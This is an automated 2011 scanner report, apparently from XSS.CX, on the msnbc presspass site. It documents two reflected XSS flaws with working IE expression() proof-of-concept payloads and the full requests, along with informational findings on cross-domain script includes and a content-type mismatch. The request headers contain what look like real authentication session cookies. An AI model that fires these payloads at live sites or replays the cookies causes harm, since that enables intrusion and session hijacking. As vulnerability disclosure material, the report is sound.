XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, presspass.msnbc.msn.com

Report generated by XSS.CX at Fri Aug 26 14:46:38 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://presspass.msnbc.msn.com/_more/section/archive [REST URL parameter 2]

1.2. http://presspass.msnbc.msn.com/_more/section/archive [REST URL parameter 3]

2. Cross-domain script include

2.1. http://presspass.msnbc.msn.com/_more/section/archive

2.2. http://presspass.msnbc.msn.com/_news/2011/08/22/7439641-mondays-views-on-sundays-news

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://presspass.msnbc.msn.com/_more/section/archive [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://presspass.msnbc.msn.com
Path:   /_more/section/archive

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b64"style%3d"x%3aexpression(alert(1))"09438a30ba3 was submitted in the REST URL parameter 2. This input was echoed as 78b64"style="x:expression(alert(1))"09438a30ba3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /_more/section78b64"style%3d"x%3aexpression(alert(1))"09438a30ba3/archive HTTP/1.1
Host: presspass.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Debian)
Content-Location: 404.php
TCN: choice
srvr: web04
Content-Type: text/html
Cache-Control: max-age=300
Date: Fri, 26 Aug 2011 18:38:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80420

<!DOCTYPE HTML>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE
...[SNIP]...
<a href="http://presspass.msnbc.msn.com/_more/section78b64"style="x:expression(alert(1))"09438a30ba3/archive?year=2011&month=8&ct=a&pc=25&sp=25#August 2011 archive_nav">
...[SNIP]...

1.2. http://presspass.msnbc.msn.com/_more/section/archive [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://presspass.msnbc.msn.com
Path:   /_more/section/archive

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6aa2"style%3d"x%3aexpression(alert(1))"1e5226d36a0 was submitted in the REST URL parameter 3. This input was echoed as d6aa2"style="x:expression(alert(1))"1e5226d36a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /_more/section/archived6aa2"style%3d"x%3aexpression(alert(1))"1e5226d36a0 HTTP/1.1
Host: presspass.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Debian)
Content-Location: 404.php
TCN: choice
srvr: web04
Content-Type: text/html
Cache-Control: max-age=300
Date: Fri, 26 Aug 2011 18:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80423

<!DOCTYPE HTML>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE
...[SNIP]...
<a href="http://presspass.msnbc.msn.com/_more/section/archived6aa2"style="x:expression(alert(1))"1e5226d36a0?year=2011&month=8&ct=a&pc=25&sp=25#August 2011 archive_nav">
...[SNIP]...

2. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://presspass.msnbc.msn.com/_more/section/archive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://presspass.msnbc.msn.com
Path:   /_more/section/archive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_more/section/archive HTTP/1.1
Host: presspass.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Content-Location: archive.php
TCN: choice
srvr: web04
Content-Type: text/html
Cache-Control: max-age=300
Date: Fri, 26 Aug 2011 18:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80243

<!DOCTYPE HTML>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=3384&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/6b4b1e09e913effb929ec9fee39aad91efdc1b4b.css?v=24522" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/b6b1ec8030084181801b32525f6094672d060a09.js?v=24522"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/b8528325fc983968a210f85a6dd5179c51049564.css?v=24522" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/5c00fcbd906afedd9f93c33da46de11b7c1a3504.js?v=24522"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://cdn.lib.newsvine.com/chrome/presspass/style.css?v=3384" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://cdn.lib.newsvine.com/chrome/abstractmikeblog/chrome.js?v=3384"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=24522"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=24522"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

2.2. http://presspass.msnbc.msn.com/_news/2011/08/22/7439641-mondays-views-on-sundays-news  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://presspass.msnbc.msn.com
Path:   /_news/2011/08/22/7439641-mondays-views-on-sundays-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/08/22/7439641-mondays-views-on-sundays-news HTTP/1.1
Host: presspass.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/id/3032608/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; sample=1; mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-1983023940-1313590626258; s_nr=1313590970577; TZM=-300; P2=pi6=95122; P1=01||,USCA0993|1||LIVE:San Jose,CA|||||||; MSNTVID=a03475b48b494e438954310bbcd4fbf8; s_vnum=1316182613692%26vn%3D2; mbox=session#1313793672746-261041#1313795879|PC#1313793672746-261041.19#1315003619|check#true#1313794079; expid=id=a7fe3882c331421c85baa0bc05bf82a7&bd=2011-08-17T14:16:11.202&v=2; MSNRPSShare=1; MUID=9D76DAC5D4D147139C18D454161BD61E; VWCUKP300=L123100/Q78795_14990_1473_082511_1_082617_477667x477159x082511x1x1/Q74134_14103_1563_081911_1_090411_476477x469173x081911x1x1; MSNRPSAuth=FAAKARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACMqWceCi4rIqyAAkECPkSBBt%2B4s3jr41aOn/TdGw0xmb9quXkiyTBR4wMYsgCyO2EFr59bIET0h7Q3ZFuFprYxerXomzHgkCZ04rxBtHOhTTGc7gnmvAIStVOqsVV91ZmWaCsIT8l4Rx5QXURuknHI4ShqHgh353iqe2WPexevdML3NYYWqSNiwSIPLf1XLyt6OFUwC40VwaCjd19qbWYRbD1jgfmbxOW%2BDY3GDRPF/fjrKxh%2BUXsuIzuPNuoTnqMn%2B3LniPTq9pRQmntwDv6/dIfBQAjTG2TVIt08gimDGNfSiih40rOzU%3D; MSPAuth=9jQRVbZwVHYMf1tAyle9NXnzzRVvd2VCLD*wLRa*2Onqpm5u5eOTkafzDy25hm6P3nrcHd2gC6WwtyIUpMWDGWAlnNbQu6*rS1*fSIx2eXChENnc9Bj7i5OLmbBkQEGH2Z; MSPProf=9XZhiCDrmDfNbhzBth667B6!9im0RUFVHdxMT9RCEcEtJi2PfGIaf44evz16t0puknt0rpbxNDR2s4GBXo2ReFmCJYjccJTjDvBbu5GesHJyWphBwgey6HNkSkEnTIONkNprQgbeWSfPt!yWHxS!ooQJWtqFi!JElgB41ordgh6LJTTdUgrlteEg$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9d&W=1; NAP=V=1.9&E=b43&C=QlU9A4WTNNCvgmGpMm_4E9VacARppsw-tOodTyTsxQJWoG70N4zp2w&W=1; SRCHHPGUSR=AS=1; SSLB=0; AxData=; Axxd=1; PageNo=1; _HOP=I=1&TS=1314381910; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=1; FROMMSN=true; s_cc=true; s_nr=1314382391724-Repeat; s_sq=msnbcom%3D%2526pid%253Dcover%25257Ctoday%25257C3032633%25257C%2526pidt%253D1%2526oid%253Dhttp%25253A//today.msnbc.msn.com/id/44285405/ns/today-weather/t/nyc-orders-evacuations-low-lying-areas-ahe%2526ot%253DA%26msnportalmusic%3D%2526pid%253DMusic.HOMEPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fentertainment.msn.com%25252Fnews%25252F%2526ot%253DA; s_cc=true; s_sq=msnbcom%3D%2526pid%253Dcover%25257Cmeet_the_p%25257C3032608%25257C%2526pidt%253D1%2526oid%253Dhttp%25253A//presspass.msnbc.msn.com/_news/2011/08/22/7439641-mondays-views-on-sundays-news%2526ot%253DA%26msnportalmusic%3D%2526pid%253DMusic.HOMEPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fentertainment.msn.com%25252Fnews%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Content-Location: article.php
TCN: choice
srvr: web04
Content-Type: text/html
Cache-Control: max-age=296
Date: Fri, 26 Aug 2011 18:14:03 GMT
Content-Length: 34991
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=3384&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/73961d90427079d86078c981fda711e5fe6ece87.css?v=24522" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/ed28ca308a1122963ee48796a3378eafc59caa7b.js?v=24522"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/474668c221811a4b94700dc8f9e1fabe59cc6064.css?v=24522" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/afc4f30bfd5e28f1f316bdcf250a41295839b2a9.js?v=24522"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://cdn.lib.newsvine.com/chrome/presspass/style.css?v=3384" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://cdn.lib.newsvine.com/chrome/abstractmikeblog/chrome.js?v=3384"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=24522"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=24522"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://presspass.msnbc.msn.com
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=presspass&path=/_news/2011/08/22/7439641-mondays-views-on-sundays-news HTTP/1.1
Host: presspass.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://presspass.msnbc.msn.com/_news/2011/08/22/7439641-mondays-views-on-sundays-news
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; sample=1; mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-1983023940-1313590626258; s_nr=1313590970577; TZM=-300; P2=pi6=95122; P1=01||,USCA0993|1||LIVE:San Jose,CA|||||||; MSNTVID=a03475b48b494e438954310bbcd4fbf8; s_vnum=1316182613692%26vn%3D2; mbox=session#1313793672746-261041#1313795879|PC#1313793672746-261041.19#1315003619|check#true#1313794079; expid=id=a7fe3882c331421c85baa0bc05bf82a7&bd=2011-08-17T14:16:11.202&v=2; MSNRPSShare=1; MUID=9D76DAC5D4D147139C18D454161BD61E; VWCUKP300=L123100/Q78795_14990_1473_082511_1_082617_477667x477159x082511x1x1/Q74134_14103_1563_081911_1_090411_476477x469173x081911x1x1; MSNRPSAuth=FAAKARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACMqWceCi4rIqyAAkECPkSBBt%2B4s3jr41aOn/TdGw0xmb9quXkiyTBR4wMYsgCyO2EFr59bIET0h7Q3ZFuFprYxerXomzHgkCZ04rxBtHOhTTGc7gnmvAIStVOqsVV91ZmWaCsIT8l4Rx5QXURuknHI4ShqHgh353iqe2WPexevdML3NYYWqSNiwSIPLf1XLyt6OFUwC40VwaCjd19qbWYRbD1jgfmbxOW%2BDY3GDRPF/fjrKxh%2BUXsuIzuPNuoTnqMn%2B3LniPTq9pRQmntwDv6/dIfBQAjTG2TVIt08gimDGNfSiih40rOzU%3D; MSPAuth=9jQRVbZwVHYMf1tAyle9NXnzzRVvd2VCLD*wLRa*2Onqpm5u5eOTkafzDy25hm6P3nrcHd2gC6WwtyIUpMWDGWAlnNbQu6*rS1*fSIx2eXChENnc9Bj7i5OLmbBkQEGH2Z; MSPProf=9XZhiCDrmDfNbhzBth667B6!9im0RUFVHdxMT9RCEcEtJi2PfGIaf44evz16t0puknt0rpbxNDR2s4GBXo2ReFmCJYjccJTjDvBbu5GesHJyWphBwgey6HNkSkEnTIONkNprQgbeWSfPt!yWHxS!ooQJWtqFi!JElgB41ordgh6LJTTdUgrlteEg$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9d&W=1; NAP=V=1.9&E=b43&C=QlU9A4WTNNCvgmGpMm_4E9VacARppsw-tOodTyTsxQJWoG70N4zp2w&W=1; SRCHHPGUSR=AS=1; SSLB=0; AxData=; Axxd=1; PageNo=1; _HOP=I=1&TS=1314381910; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=1; FROMMSN=true; s_nr=1314382391724-Repeat; s_cc=true; s_sq=msnportalmusic%3D%2526pid%253DMusic.HOMEPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fentertainment.msn.com%25252Fnews%25252F%2526ot%253DA; jt_time=1314382437347; jt_uuid=132074c5be3-2098ed51f89bad71; s_cc=true; s_sq=msnportalmusic%3D%2526pid%253DMusic.HOMEPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fentertainment.msn.com%25252Fnews%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Debian)
Content-Location: printer.php
TCN: choice
srvr: web04
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=259
Date: Fri, 26 Aug 2011 18:14:54 GMT
Content-Length: 493
Connection: close

{"cpk":{"version":"24522"},"conf":{"matchPath":"","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vine","defaultAvatar":"m
...[SNIP]...

Report generated by XSS.CX at Fri Aug 26 14:46:38 GMT-06:00 2011.